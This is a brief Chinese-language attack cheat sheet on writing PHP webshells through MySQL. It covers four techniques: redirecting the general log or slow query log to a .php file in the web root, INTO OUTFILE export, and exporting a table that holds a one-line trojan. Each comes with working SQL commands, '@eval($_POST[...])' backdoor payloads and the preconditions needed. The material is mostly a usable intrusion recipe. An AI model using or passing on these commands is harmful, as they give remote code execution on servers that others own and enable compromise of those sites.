1、日志文件写 shell
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell: # 查看当前配置 SHOW VARIABLES LIKE 'general%'; # 更改日志文件位置 set global general_log = "ON"; set global general_log_file='C:/phpStudy/WWW/zyx.php'; # 往日志里面写入 payload select '<?php phpinfo();?>';
2、在知道绝对路径的情况下,利用INTO OUTFILE
select @@basedir; 查找绝对路径 show global variables like '%secure_file_priv%'; NULL 不允许导入或导出 /tmp 只允许在 /tmp 目录导入导出 空 不限制目录 如果有权限 select '<?php @eval($_POST[a]);?>'INTO OUTFILE 'E:/phpstudy_pro/WWW/test.php'
3、慢查询写入webshell
show variables like '%slow%'
set global slow_query_log=on;
set global slow_query_log_file='E:/phpstudy_pro/WWW/slow.php'
select '<?php @eval($_POST[shell]);?>' or sleep(10);
4、创建数据库和表写入webshell:
利用条件:Root数据库用户(root权限); 网站绝对路径(确定有写入权限); secure_file_priv没有具体值。操作步骤:1)执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。
CREATE TABLE test( id text(500) not null); INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>'); SELECT id FROM test INTO OUTFILE 'C:/phpstudy/WWW/1.php'; DROP TABLE IF EXISTS test;